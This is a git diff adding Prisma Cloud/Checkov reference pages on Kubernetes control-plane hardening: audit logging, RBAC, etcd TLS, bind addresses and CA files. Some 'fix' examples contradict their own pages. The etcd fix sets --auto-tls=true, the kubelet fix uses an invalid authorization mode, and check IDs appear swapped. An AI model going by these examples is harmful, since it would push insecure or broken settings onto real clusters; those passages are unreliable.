+ - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc new file mode 100644 index 
000000000..edb22709c --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxage-argument-is-set-to-30-or-as-appropriate.adoc @@ -0,0 +1,66 @@ +== The --audit-log-maxage argument is not set appropriately +// Retention period for '--audit-log-maxage' argument insufficient + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8948f1c0-0207-4d94-99f3-f692a951cbb7 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py[CKV_K8S_92] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes, Helm, Kustomize + +|=== + + + +=== Description + + +Retain the logs for at least 30 days or as appropriate. +Retaining logs for at least 30 days ensures that you can go back in time and investigate or correlate any events. +Set your audit log retention period to 30 days or as per your business requirements. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --audit-log-maxage=40 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc new file mode 100644 index 000000000..32477dcad --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxbackup-argument-is-set-to-10-or-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The 
--audit-log-maxbackup argument is not set appropriately +// '--audit-log-maxbackup' argument not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a6e0292e-c91a-4339-a2b3-29141f6a9b94 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py[CKV_K8S_93] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Retain 10 or an appropriate number of old log files. +Kubernetes automatically rotates the log files. +Retaining old log files ensures that you have sufficient log data available for carrying out any investigation or correlation. +For example, if you have set a maximum file size of 100 MB and keep 10 old log files, you would have approximately 1 GB of log data that you can use for your analysis. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --audit-log-maxbackup=15 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ... +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc new file mode 100644 index 000000000..b8cce48ad --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-maxsize-argument-is-set-to-100-or-as-appropriate.adoc @@ -0,0 +1,67 @@ +== The --audit-log-maxsize argument is not set appropriately +// 
'--audit-log-maxsize' argument not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6767c20f-d201-4c6c-8294-53d294fd39f0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py[CKV_K8S_94] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Rotate log files on reaching 100 MB or as appropriate. +Kubernetes automatically rotates the log files. +Retaining old log files ensures that you have sufficient log data available for carrying out any investigation or correlation. +If you have set a maximum file size of 100 MB and keep 10 old log files, you would have approximately 1 GB of log data that you can use for your analysis. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --audit-log-maxsize=150 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ... +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-path-argument-is-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-path-argument-is-set.adoc new file mode 100644 index 000000000..d9ef69ca9 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-audit-log-path-argument-is-set.adoc @@ -0,0 +1,67 @@ +== The --audit-log-path argument is not set +// '--audit-log-path' argument not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 3814f782-44fb-47fc-82b2-390669d518a1 + +|Checkov Check
ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py[CKV_K8S_91] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable auditing on the Kubernetes API Server and set the desired audit log path. +Auditing the Kubernetes API Server provides a security-relevant chronological set of records documenting the sequence of activities that have affected system by individual users, administrators or other components of the system. +Even though currently, Kubernetes provides only basic audit capabilities, it should be enabled. +You can enable it by setting an appropriate audit log path. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + + - kube-apiserver + + - --audit-log-path=/path/to/log + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-node.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-node.adoc new file mode 100644 index 000000000..b4aea1ea7 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-node.adoc @@ -0,0 +1,65 @@ +== The --authorization-mode argument does not include node +// '--authorization-mode' argument does not include node + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5cc5bc2e-ad86-49e7-b48e-5e64745439c4 + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNode.py[CKV_K8S_75] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Restrict kubelet nodes to reading only objects associated with them. +The Node authorization mode only allows kubelets to read Secret, ConfigMap, PersistentVolume, and PersistentVolumeClaim objects associated with their nodes. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --authorization-mode=RBAC,Node + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-rbac.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-rbac.adoc new file mode 100644 index 000000000..217a78a36 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-includes-rbac.adoc @@ -0,0 +1,66 @@ +== The --authorization-mode argument does not include RBAC +// '--authorization-mode' argument does not include RBAC + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8b949f5d-4e7d-4f79-98f0-d9d633f67881 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeRBAC.py[CKV_K8S_77] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Turn on Role Based Access Control. 
+Role Based Access Control (RBAC) allows fine-grained control over the operations that different entities can perform on different objects in the cluster. +It is recommended to use the RBAC authorization mode. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --authorization-mode=RBAC,Node + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc new file mode 100644 index 000000000..7f671b751 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow-1.adoc @@ -0,0 +1,65 @@ +== The --authorization-mode argument set to 'AlwaysAllow' for Kubelet +//' --authorization-mode' argument set to AlwaysAllow for Kubelet + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b7c20b54-5888-4f2a-8b25-7c918f6beb78 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerAuthorizationModeNotAlwaysAllow.py[CKV_K8S_74] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not always authorize all requests. +The API Server, can be configured to allow all requests. +This mode should not be used on any production cluster. 
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --authorization-mode=RBAC,Node + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + ... +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc new file mode 100644 index 000000000..568b78c4e --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-authorization-mode-argument-is-not-set-to-alwaysallow.adoc @@ -0,0 +1,67 @@ +== The --authorization-mode argument is set to AlwaysAllow for API server +// '--authorization-mode' argument set to 'AlwaysAllow' for API server + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e6128ec-aab4-4985-8212-a76202f2a3f0 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py[CKV_K8S_139] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not allow all requests. +Enable explicit authorization. +Kubelets, by default, allow all authenticated requests (even anonymous ones) without needing explicit authorization checks from the apiserver. +You should restrict this behavior and only allow explicitly authorized requests.
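+The same restriction can also be expressed in a kubelet configuration file instead of command-line flags. A sketch using the `KubeletConfiguration` API (the anonymous-auth setting is included for completeness; values are illustrative):
+
+[source,yaml]
+----
+apiVersion: kubelet.config.k8s.io/v1beta1
+kind: KubeletConfiguration
+authentication:
+  anonymous:
+    enabled: false
+authorization:
+  # Delegate authorization to the API server rather than AlwaysAllow
+  mode: Webhook
+----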
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --authorization-mode=RBAC,node + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc new file mode 100644 index 000000000..ff5ddea92 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-auto-tls-argument-is-not-set-to-true.adoc @@ -0,0 +1,68 @@ +== The --auto-tls argument is set to True +// '--auto-tls' argument set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 253fcd41-e93f-479e-9176-2d8062e9e0d8 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py[CKV_K8S_118] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not use self-signed certificates for TLS. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should not be available to unauthenticated clients. +You should enable the client authentication via valid certificates to secure the access to the etcd service. 
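+Rather than relying on `--auto-tls`, which generates self-signed certificates, etcd can be configured with explicitly issued certificates and client certificate authentication. A sketch of the relevant flags (the certificate paths are illustrative):
+
+[source,yaml]
+----
+spec:
+  containers:
+  - command:
+    - etcd
+    - --auto-tls=false
+    - --cert-file=/etc/etcd/pki/server.crt
+    - --key-file=/etc/etcd/pki/server.key
+    - --client-cert-auth=true
+    - --trusted-ca-file=/etc/etcd/pki/ca.crt
+----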
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + annotations: + scheduler.alpha.kubernetes.io/critical-pod: "" + creationTimestamp: null + labels: + component: etcd + tier: control-plane + name: etcd + namespace: kube-system +spec: + containers: + - command: ++ - etcd ++ - --auto-tls=true + image: k8s.gcr.io/etcd-amd64:3.2.18", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-basic-auth-file-argument-is-not-set.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-basic-auth-file-argument-is-not-set.adoc new file mode 100644 index 000000000..1ef9a44aa --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-basic-auth-file-argument-is-not-set.adoc @@ -0,0 +1,97 @@ +== The --basic-auth-file argument is Set +// '--basic-auth-file' argument is set + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5baa14e0-7150-46fe-af54-6679b4d1b4db + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerBasicAuthFile.py[CKV_K8S_69] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not use basic authentication. +Basic authentication uses plaintext credentials for authentication. +Currently, the basic authentication credentials last indefinitely, and the password cannot be changed without restarting the API server. +The basic authentication is currently supported for convenience. +Hence, basic authentication should not be used. 
+ +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: + - kube-apiserver + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc new file mode 100644 index 000000000..73f5df4ab --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001-1.adoc @@ -0,0 +1,65 @@ +== The --bind-address argument is not set to 127.0.0.1 +// '--bind-address' argument not set to 127.0.0.1. 
+ + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2484b8cc-2549-4ef3-ad63-3188d6a2013b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py[CKV_K8S_115] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind the scheduler service to non-loopback insecure addresses. +The Scheduler API service which runs on port 10251/TCP by default is used for health and metrics information and is available without authentication or encryption. +As such it should only be bound to a localhost interface, to minimize the cluster's attack surface. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-scheduler + tier: control-plane + name: kube-scheduler + namespace: kube-system +spec: + containers: + - command: ++ - kube-scheduler ++ - --bind-address=127.0.0.1 + image: gcr.io/google_containers/kube-scheduler-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001.adoc new file mode 100644 index 000000000..f5d866637 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-bind-address-argument-is-set-to-127001.adoc @@ -0,0 +1,64 @@ +== The --bind-address argument for controller managers is not set to 127.0.0.1 +// '--bind-address' argument for controller managers not set to 127.0.0.1 + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9fa4bd4d-c778-4205-a842-6f75a515ab1c + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py[CKV_K8S_113] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Do not bind the Controller Manager service to non-loopback insecure addresses. +The Controller Manager API service which runs on port 10252/TCP by default is used for health and metrics information and is available without authentication or encryption. +As such it should only be bound to a localhost interface, to minimize the cluster's attack surface + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + " apiVersion: v1 + kind: Pod + metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system + spec: + containers: + - command: + - kube-controller-manager ++ - --bind-address=127.0.0.1 + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc new file mode 100644 index 000000000..8eef8b4f8 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-cert-file-and-key-file-arguments-are-set-as-appropriate.adoc @@ -0,0 +1,66 @@ +== The --cert-file and --key-file arguments are not set appropriately +// '--cert-file' and '--key-file' arguments not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 88b22903-9439-48f6-86ad-7f1165d0d70a + +|Checkov Check ID +| 
https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py[CKV_K8S_116] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Configure TLS encryption for the etcd service. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be encrypted in transit. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --etcd-certfile=/path/to/cert ++ - --etcd-keyfile=/path/to/key + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc new file mode 100644 index 000000000..71fefd252 --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-ca-file-argument-is-set-as-appropriate-scored.adoc @@ -0,0 +1,67 @@ +== The --client-ca-file argument for API Servers is not set appropriately +// '--client-ca-file' argument for API Servers not set appropriately + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5afba38b-5dba-4292-80f2-fa901f7b2f6d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py[CKV_K8S_140] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + 
+|=== + + + +=== Description + + +Enable Kubelet authentication using certificates. +The connections from the apiserver to the kubelet are used for fetching logs for pods, attaching (through kubectl) to running pods, and using the kubelet's port-forwarding functionality. +These connections terminate at the kubelet's HTTPS endpoint. +By default, the apiserver does not verify the kubelet's serving certificate, which makes the connection subject to man-in-the-middle attacks, and unsafe to run over untrusted and/or public networks. +Enabling Kubelet certificate authentication ensures that the apiserver can authenticate the Kubelet before submitting any requests. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kubelet + tier: control-plane + name: kubelet + namespace: kube-system +spec: + containers: + - command: ++ - kubelet ++ - --client-ca-file=test.pem + image: gcr.io/google_containers/kubelet-amd64:v1.6.0 + ...", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc new file mode 100644 index 000000000..28b7b1a0f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-client-cert-auth-argument-is-set-to-true.adoc @@ -0,0 +1,67 @@ +== The --client-cert-auth argument is not set to True +// '--client-cert-auth' argument not set to True + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 9bab9853-71b2-4332-83e0-f191a1775af4 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py[CKV_K8S_117] + +|Severity +|MEDIUM + +|Subtype +|Build + 
+|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Enable client authentication on etcd service. +etcd is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should not be available to unauthenticated clients. +You should enable the client authentication via valid certificates to secure the access to the etcd service. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + annotations: + scheduler.alpha.kubernetes.io/critical-pod: "" + creationTimestamp: null + labels: + component: etcd + tier: control-plane + name: etcd + namespace: kube-system +spec: + containers: + - command: ++ - etcd ++ - --client-cert-auth=true + image: k8s.gcr.io/etcd-amd64:3.2.18", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc new file mode 100644 index 000000000..e5e86a81a --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate-1.adoc @@ -0,0 +1,98 @@ +== The --etcd-cafile argument is not set appropriately +// '--etcd-cafile' argument not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 48ec1bd2-6f41-4289-8d51-7d7937633644 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py[CKV_K8S_102] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +*etcd* should be configured to make use of TLS encryption for client connections. 
+*etcd* is a highly-available key value store used by Kubernetes deployments for persistent storage of all of its REST API objects. +These objects are sensitive in nature and should be protected by client authentication. +This requires the API server to identify itself to the *etcd* server using an SSL Certificate Authority file. + +=== Fix - Buildtime + + +*Kubernetes* + + +* *Kind:* Pod + + +[source,yaml] +---- +{ + "apiVersion: v1 +kind: Pod +metadata: + creationTimestamp: null + labels: + component: kube-apiserver + tier: control-plane + name: kube-apiserver + namespace: kube-system +spec: + containers: + - command: ++ - kube-apiserver ++ - --etcd-cafile=ca.file + image: gcr.io/google_containers/kube-apiserver-amd64:v1.6.0 + livenessProbe: + failureThreshold: 8 + httpGet: + host: 127.0.0.1 + path: /healthz + port: 6443 + scheme: HTTPS + initialDelaySeconds: 15 + timeoutSeconds: 15 + name: kube-apiserver + resources: + requests: + cpu: 250m + volumeMounts: + - mountPath: /etc/kubernetes/ + name: k8s + readOnly: true + - mountPath: /etc/ssl/certs + name: certs + - mountPath: /etc/pki + name: pki + hostNetwork: true + volumes: + - hostPath: + path: /etc/kubernetes + name: k8s + - hostPath: + path: /etc/ssl/certs + name: certs + - hostPath: + path: /etc/pki + name: pki", +} +---- + diff --git a/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc new file mode 100644 index 000000000..aa1632f0f --- /dev/null +++ b/code-security/policy-reference/kubernetes-policies/kubernetes-policy-index/ensure-that-the-etcd-cafile-argument-is-set-as-appropriate.adoc @@ -0,0 +1,126 @@ +== Encryption providers are not appropriately configured +// Encryption providers not set appropriately + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma 
Cloud Policy ID +| b52de5ab-ae4e-461f-a94d-5980a59078bf + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py[CKV_K8S_104] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Kubernetes,Helm,Kustomize + +|=== + + + +=== Description + + +Where etcd encryption is used, appropriate providers should be configured. +Where etcd encryption is used, it is important to ensure that the appropriate set of encryption providers is used. +Currently, the aescbc, kms and secretbox are likely to be appropriate options.
